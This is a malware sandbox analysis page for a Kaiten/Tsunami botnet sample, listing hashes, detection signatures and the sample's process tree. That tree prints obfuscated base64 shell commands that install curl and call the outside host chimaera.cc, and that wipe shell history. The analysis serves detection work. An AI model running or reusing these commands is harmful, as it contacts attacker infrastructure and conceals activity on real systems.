Overview

overview

10

Static

static

7

f09c0d5883...kes118

ubuntu-18.04-amd64

10

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    15-04-2024 07:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f09c0d5883a221d2e5f762480e946a78_JaffaCakes118

  • Size

    42KB

  • MD5

    f09c0d5883a221d2e5f762480e946a78

  • SHA1

    506386147d393cef81019dda55ac85125914c6be

  • SHA256

    0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

  • SHA512

    a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20

  • SSDEEP

    768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score
10/10
kaitenbotnet

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 1 IoCs
  • Detects Kaiten/Tsunami payload 1 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

    botnetkaiten
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
    /tmp/f09c0d5883a221d2e5f762480e946a78_JaffaCakes118
    1⤵
    • Reads runtime system information
    PID:1539
    • /bin/sh
      sh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"
      2⤵
        PID:1540
        • /bin/bash
          bash
          3⤵
            PID:1543
            • /usr/bin/curl
              curl -sLk http://chimaera.cc/log/inf.php -o /dev/null
              4⤵
                PID:1544
              • /usr/bin/clear
                clear
                4⤵
                  PID:1553
              • /usr/bin/base64
                base64 -d
                3⤵
                  PID:1542
              • /bin/sh
                sh -c "wget -q -O /dev/null http://chimaera.cc/log/inf.php || curl -s -o /dev/null http://chimaera.cc/log/inf.php"
                2⤵
                  PID:1554
                  • /usr/bin/wget
                    wget -q -O /dev/null http://chimaera.cc/log/inf.php
                    3⤵
                      PID:1555
                    • /usr/bin/curl
                      curl -s -o /dev/null http://chimaera.cc/log/inf.php
                      3⤵
                        PID:1559

                  Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads